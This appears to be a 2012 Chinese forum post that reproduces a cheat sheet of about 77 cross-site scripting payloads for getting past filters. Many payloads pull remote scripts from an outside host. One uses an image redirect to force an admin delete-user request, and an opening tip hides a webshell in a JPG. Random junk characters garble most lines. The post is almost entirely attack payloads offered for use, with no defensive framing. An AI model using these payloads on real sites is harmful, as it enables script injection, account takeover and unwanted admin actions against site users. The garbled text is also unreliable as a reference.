跨站图片shell) T1 v" u' ?+ Y5 ? o8 F; @
XSS跨站代码 <script>alert("")</script>
8 N6 a! v m- R0 G8 m6 ^! j0 W" u! q7 \7 n( V5 B) v
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马9 i0 }% `6 i# C7 J% l5 Y
* Z' M) i& r# n! i1 d8 O
+ l7 c1 y) q9 \6 b. k
8 N( d' t7 t$ A% z) @, u7 {7 t% Q1 u
1)普通的XSS JavaScript注入
" g( ?8 R9 q0 `+ R, U<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> A+ W: A4 h9 t; W
7 _- D9 C& z6 b$ T
(2)IMG标签XSS使用JavaScript命令1 ~) v* L! @& i2 _7 d) Q
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
# [6 @& w, @" J! w" L$ D+ ?& a, K a/ [& f6 W. ~
(3)IMG标签无分号无引号( y) S( Z, D( O1 s' J. k& n
<IMG SRC=javascript:alert(‘XSS’)>7 ]$ k9 }. I$ ]& `" g. k
3 A# P! u1 E ~+ w
(4)IMG标签大小写不敏感( S8 ~( B6 V+ f5 w+ ]
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>7 h# Z/ o" c% t- D: K- e3 Y
+ U$ s: B" }$ g
(5)HTML编码(必须有分号)
7 @, S8 z: p/ I" A+ G6 X- Z; y- ~<IMG SRC=javascript:alert(“XSS”)>
4 Q1 D) E: E0 e. ]* y! @% Y6 C6 g. @
(6)修正缺陷IMG标签5 b; z; X: i) [0 H. T( H0 b
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
1 M2 j! }, z! P$ T1 o0 T/ ^
( q2 T* n x' ~0 {/ K/ U% o(7)formCharCode标签(计算器)
$ n$ G$ x0 F$ J<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
0 F# F$ ?; p4 F( i( O0 V! u& q0 y! r2 v
(8)UTF-8的Unicode编码(计算器)
- |! Q% l! T6 C% o<IMG SRC=jav..省略..S')>
; B4 q" q. K8 b
0 ?9 u: F6 @; K7 V& }% P: M3 g: C(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
4 c9 u, I) e' Q4 g7 Q1 X0 A<IMG SRC=jav..省略..S')>" M) E# f0 x5 b( Q# e5 v- K
; w2 M* M9 i# I9 N# `, z
(10)十六进制编码也是没有分号(计算器)
3 Z' H, c$ y0 U! w9 L) f<IMG SRC=java..省略..XSS')>
9 G. w! r2 B: w1 L5 ]: w
" A4 k, o( k; u! e. z, D( h( u(11)嵌入式标签,将Javascript分开
' _$ t) U5 j! C# v<IMG SRC=”jav ascript:alert(‘XSS’);”>
9 D6 M& s+ @2 }+ J* \7 n
X' B3 t2 `5 v% M8 k. w6 x9 `(12)嵌入式编码标签,将Javascript分开
7 p1 p, b7 k) m1 m" f1 @<IMG SRC=”jav ascript:alert(‘XSS’);”>
: \% v. G$ _; O! k2 ?% R$ w5 Q
* A! l9 J" F9 d8 }! w* |! |# H(13)嵌入式换行符
. r6 R% J" I' l3 Y2 r<IMG SRC=”jav ascript:alert(‘XSS’);”>9 Y5 I9 x; R" j& K" e( k
2 a" d: B$ Q5 I6 k4 W2 z(14)嵌入式回车
( t( e: c" K1 Z9 w( y0 V G<IMG SRC=”jav ascript:alert(‘XSS’);”>
3 x) Q; ?; [+ @' K* ]" Z! `
8 z- e6 B2 B' F6 O0 {8 u# S, Z3 Y(15)嵌入式多行注入JavaScript,这是XSS极端的例子
, Q& |. R) U9 e<IMG SRC=”javascript:alert(‘XSS‘)”>" T& H# W. S$ \% @$ A7 m
9 {3 V7 e, @9 Y(16)解决限制字符(要求同页面)
9 C/ c: Z% }0 p$ ~4 k0 m6 w<script>z=’document.’</script>
1 E ^1 N; h' \# P6 g<script>z=z+’write(“‘</script>
8 I7 ~% M0 q5 {" \2 [$ g" `5 l1 I+ a<script>z=z+’<script’</script>: f- f. x0 c& U: [; L" |. G
<script>z=z+’ src=ht’</script>7 c( c$ E1 W, H7 `
<script>z=z+’tp://ww’</script>
6 D2 }7 B& f) l7 E& |/ a4 W<script>z=z+’w.shell’</script>
% n" T9 _) P' x$ q) \<script>z=z+’.net/1.’</script>
1 q P# u2 c; _<script>z=z+’js></sc’</script>
& I9 c* N* M9 N2 z* \<script>z=z+’ript>”)’</script>9 O, L/ H9 G+ F7 y: {- H# H* h
<script>eval_r(z)</script>
+ C3 Y. V& @- h- ~# Y# r& Q
* n3 ]. w& T0 n. J(17)空字符
A0 F4 v2 \) U3 o# x& E3 Kperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
9 ]" |, R- @9 F- z7 d
% R0 S4 `- |" Q, y8 f! C(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
" b: @0 \$ d) ]" A w" ` \perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
5 J S3 Q! J4 @( _) e2 l! {+ w& r( X3 a4 p. D
(19)Spaces和meta前的IMG标签
, w4 j$ N# T; x( l1 f& E& D<IMG SRC=” javascript:alert(‘XSS’);”>
* Y1 s% z3 e: X/ p) d% \
, |- A f" `8 V# }' a& J(20)Non-alpha-non-digit XSS; i6 k M6 b F) [
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>6 d. L9 K9 {( k2 B( {
3 E: J5 r1 J: R1 d! F
(21)Non-alpha-non-digit XSS to 20 z5 o: I+ E" j" Q' \( Z$ J
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>7 ^" I6 D3 I: D/ r- A8 {3 u9 l9 b
) p. B; d; G0 w. L
(22)Non-alpha-non-digit XSS to 3+ [' }0 n0 h' d& U5 t3 t. T7 n, N
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
* j7 r l! F) U! T7 e2 @+ p+ b' c
$ i) `. b2 o4 N6 c2 ~0 E! E0 Z' N(23)双开括号: F# ^9 _% b5 g& l2 T
<<SCRIPT>alert(“XSS”);//<</SCRIPT>9 V# o0 D* E5 f6 h l7 D' Z
" h( J- j5 |* [! K( j" u(24)无结束脚本标记(仅火狐等浏览器)
# T% m/ M3 e- w% S+ L9 S<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>% B0 R3 b3 `$ y
- x4 @/ u8 [/ ^9 q
(25)无结束脚本标记27 T2 n X* a$ g3 Y+ H& G' J
<SCRIPT SRC=//3w.org/XSS/xss.js>
. F/ U: j3 V! b9 @5 d) x- U8 G7 J
(26)半开的HTML/JavaScript XSS
9 I |2 ~, q4 [: p. H' B<IMG SRC=”javascript:alert(‘XSS’)”
9 p3 v3 H' h% P) d0 x+ N6 z( F7 v# A+ O0 e- ]8 |$ \/ ^" S; `
(27)双开角括号# R$ V2 `" e+ T5 B4 v) d
<iframe src=http://3w.org/XSS.html <
: T& P& w3 R3 f$ ~7 [% G
" a6 p& A1 Z" D" F( d# `8 | O(28)无单引号 双引号 分号
0 E' a0 H* E+ U: M3 ?( J<SCRIPT>a=/XSS/! v1 p7 s; N+ V% m$ @
alert(a.source)</SCRIPT>' ^* Q* A4 |4 e9 |3 C
) l7 t: ^4 x a j(29)换码过滤的JavaScript
; {, f/ \: V3 |- s8 h2 ?\”;alert(‘XSS’);//7 M3 Q8 Q; e# ^8 F
4 ^$ o' a0 Q5 `. d, K7 N. n& K
(30)结束Title标签
+ v7 T) v; j- g9 @# S0 y( D/ u% q2 X</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>0 J/ T. T, P" C7 P T
8 S: |& P* p e( a3 ?& _
(31)Input Image
6 R6 ^& q; I3 G<INPUT SRC=”javascript:alert(‘XSS’);”>: u% |% y/ W- G5 p" `
0 N1 g( T% b3 X(32)BODY Image9 r5 p+ R- @5 ]( {1 `" M# t& }4 f
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>, p! E9 |9 I4 Q E( o$ }
4 x6 r: {: M( `& j, p
(33)BODY标签6 j: @: \$ w* z1 H
<BODY(‘XSS’)># v0 m, F% m8 s2 \& Q9 _
$ B" B" r! ?4 h) `: S; [$ G
(34)IMG Dynsrc* | `0 T, L7 |, e5 c/ ]/ ], F% r
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
# f" S2 O) P+ }4 \5 l; H; h- Y) V0 B' v, w4 k' g; L
(35)IMG Lowsrc. h2 a o; i w, v
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
9 E% M. R+ M$ }, W' a+ F! G) g1 }
6 G K( E7 C! [+ H(36)BGSOUND" U; z2 J2 z( a1 ^7 r: G; V
<BGSOUND SRC=”javascript:alert(‘XSS’);”>. Y" g( ^; a6 w+ @1 H* ^
b+ ]( x0 N0 i3 k2 Y
(37)STYLE sheet
5 h8 F# S4 P0 j3 G) H! l<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>2 M! J6 m# n7 n5 G# `- F' I
0 @0 R4 ] s) O' E# R(38)远程样式表
+ j0 t$ u! I! w<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
# W1 M! d5 \9 I, U
& }) j# \8 j( F0 ~7 E(39)List-style-image(列表式)
/ r. I* u8 C( h) }3 h( M<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
: o% Y/ M; Y' w7 S: k4 \, X" Y8 W! v& q7 V( j, ]
(40)IMG VBscript
$ q5 c. o6 ^3 V$ ^<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
) Q. x- ] p4 f7 [0 O, _
% T* U5 G1 g7 i8 H0 a" ` ^7 l(41)META链接url3 T, Z8 z( h3 F! f4 d) Y
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>- {4 t9 K8 O, r. n- i4 n4 `
* y3 ]+ t, ^3 |. [, c1 a8 l( R
(42)Iframe/ G! A4 T1 W7 z5 U2 {
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
- s8 L0 p7 a; T! i(43)Frame7 P7 L4 ?0 [, }! y/ B+ t8 X) j
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
, _0 [# l* b O& b
+ \: m+ s/ e4 Q* g6 }(44)Table8 A1 [. w! W" @6 Y
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
9 I) k* o2 A( R; {& a2 R6 J/ B J! n- z" \* s/ ]: \1 q
(45)TD
: T+ o2 ]2 }) @9 q) j# }<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>* i8 h& G/ ?7 G+ ^
/ d3 r) U3 T& ]7 V' I/ P7 U- T
(46)DIV background-image
5 h2 `& M0 U- I4 Y9 v9 c8 a. l<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>4 V k& O M9 E* v4 I9 H6 ]
( A3 S2 u+ l' B$ L(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)- Z* B- X. e4 a" v
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>7 o5 f2 m, m4 A9 f! O1 Q
9 s8 A3 w3 ^! k( g2 p, v, E, y% Y(48)DIV expression: H5 E4 `, Z2 t- M' h
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
+ {. r: @) o, X3 I7 @; D" f' ] k( @$ W0 E( B8 n+ B9 a( H3 X+ y2 L( I
(49)STYLE属性分拆表达6 T- F& ?/ m2 X, w! U! J
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
6 m7 E8 Z, e/ f5 T ?" `8 ?$ P( I
# `* z+ O! N/ ^6 s }(50)匿名STYLE(组成:开角号和一个字母开头); ^2 e4 _+ r r
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>) Q* {1 J' Q1 }+ K$ r% p, |
2 x5 ~3 q4 } w& e: O; n+ T7 J, L0 C
(51)STYLE background-image
! w% D( S9 W3 V: c0 n* O<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>) I) C- N9 h9 |) ^
% s( C' c" g3 G0 K7 h5 w$ r) z(52)IMG STYLE方式! A: ^8 i& s6 e2 c
exppression(alert(“XSS”))’>- U# n- M- Z. \! n! y
; T* H' M1 z/ Q+ U: s5 D(53)STYLE background
# @, s2 j" ?6 R$ h3 \, ?<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>$ A9 d! O5 r4 L/ X: p/ O" {
8 T( t* E6 U1 a* r$ ]4 t) A(54)BASE2 @( O( a- E9 a# p! \ u
<BASE HREF=”javascript:alert(‘XSS’);//”>
# u6 L' r5 G% p4 F" T0 X' J# P# B+ g( p6 H I) _1 `
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS( i( X q6 `6 y6 Y; t0 x |4 C
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
# V1 ]; n2 i' |2 x/ ^! U) w% {2 W# \1 [: r; C" U
(56)在flash中使用ActionScrpt可以混进你XSS的代码, p6 f$ O6 n1 y% t" c% o3 a9 Z
a=”get”;
- a2 r3 d+ m8 r0 R' A, x: g1 cb=”URL(\”";
( z# S' I0 u# [7 N3 J1 i4 W2 Ic=”javascript:”;2 W5 x3 M2 w& Z; z- N
d=”alert(‘XSS’);\”)”;
$ P* {3 J3 d' O$ y! {7 U, O1 u# u }eval_r(a+b+c+d);/ h' {6 y, y4 M% a0 V, q
, `9 c6 T% s3 D8 z; x
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上4 A. {$ W" @4 Q3 `9 |
<HTML xmlns:xss>1 L6 |! k8 W# \3 V
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
. c- `* w' L: J0 [. x/ u<xss:xss>XSS</xss:xss>: ~5 A! f T* F1 l- i. L
</HTML>
K; `% i M+ ^3 ^2 l9 ^
0 S$ o9 k4 N7 A0 j) e3 i# X% x(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
* F( p5 l$ G; h<SCRIPT SRC=””></SCRIPT>2 z! g5 o+ m" v: t: i
2 P0 z& J9 v/ ?1 p9 {# y(59)IMG嵌入式命令,可执行任意命令
; c* r; {9 X" E* e, R<IMG SRC=”http://www.XXX.com/a.php?a=b”>: q( B8 s2 Q& l/ D7 `' U
! r4 x/ v" y) k! K/ V K2 g4 ~(60)IMG嵌入式命令(a.jpg在同服务器)/ ~6 X- N6 ?! H
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser! b( w6 a( P1 C. F! `0 i F7 J3 t9 M+ J
: W5 ]- Y) w$ a: q. M% O6 J4 a(61)绕符号过滤
4 z0 \1 i/ S) r5 z% r<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
) f4 X& M0 v8 v! S3 |/ q& s. ? N$ Y. C r) f
(62)& _+ ~* N$ H( t" [! d
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
$ y+ t' ~- q% ] R7 Q9 U5 R4 ?* _# T, s+ ~5 w
(63)# q, |0 k$ \" W
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
( |1 m# ]. s" F* |! r1 A# N y
# P# ]5 B! s! I6 h$ Q. r1 N) D(64)/ d) H2 |* r: A8 y/ n" B; C
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
/ r- V0 V% X6 N4 I8 S# M
6 N+ R0 i4 d3 v(65)
0 }- M, N; x: [9 H, y' }<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
8 f Z6 w* @* V \' k- v
: `3 f% \' i) k( x5 E: a" G/ C4 q9 |(66)
# M$ U; h+ H- u! L& }& A7 Y% p<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT> U1 v3 ~7 y/ o* c8 w6 i7 [8 z
* F' s! G1 B7 X# B; E) F* a: d(67)* ]8 j8 g* T' C
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>/ p3 t, |7 t& ]* B) z. Q
" H# R& E1 e! p. e* e9 F6 g; o6 ?
(68)URL绕行
3 _ V0 m, I; a0 a9 [" Q- V$ ]<A HREF=”http://127.0.0.1/”>XSS</A>
& R# E- y" v+ B' F6 O2 s, Y3 J+ v. {5 a
(69)URL编码
4 A1 Z: V- N# d6 m2 o<A HREF=”http://3w.org”>XSS</A>
! q- V( z; m: c5 o
6 F5 r8 C: x" I$ U; v(70)IP十进制
( y1 E2 d0 f6 d ~9 L8 c6 _<A HREF=”http://3232235521″>XSS</A>
# U2 B" `# I5 D- q! T7 G
t' W; n7 `* Y8 c9 y(71)IP十六进制8 `! q& G' O1 I3 |, W/ D
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>5 j) z2 L4 ~8 y) \: `5 Z
1 `: r- J9 T" z3 S1 i4 y8 l( u0 r
(72)IP八进制: ] a+ I5 M, o3 ^. T
<A HREF=”http://0300.0250.0000.0001″>XSS</A>2 a. d( w% _5 p- s* y
, ]2 o; q2 _( l: v: H4 y4 i(73)混合编码$ t1 v6 z* g, o- `
<A HREF=”h
* z" i4 K1 A" A2 C7 c% Ktt p://6 6.000146.0×7.147/”">XSS</A>
% X% s' E/ N3 {$ G' B
_% g% z0 u% P4 m. }" J8 |9 Z(74)节省[http:]
; j# }4 Y0 [: j+ V T" }+ `0 n<A HREF=”//www.google.com/”>XSS</A>
. ^- Z6 O+ A* H! |3 M% n
, l, R, Q; D* g: |: N5 E(75)节省[www]
: {3 t9 e3 `% w* ?) x" {9 x/ l<A HREF=”http://google.com/”>XSS</A>: |1 j* r* }- R: `! j: `5 r
8 E( I) x9 B1 G
(76)绝对点绝对DNS& g, R4 h6 ^) W- K1 z7 B! q4 g
<A HREF=”http://www.google.com./”>XSS</A>
o" B7 ?) x$ H* p% F9 j6 F
9 g8 h3 S& A. H" a3 ?(77)javascript链接3 l& `% c' h8 y- G
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>: a8 e C( s4 j6 q3 g* j6 \4 R
|
发表于 2012-9-13 17:04:56
收藏
支持
反对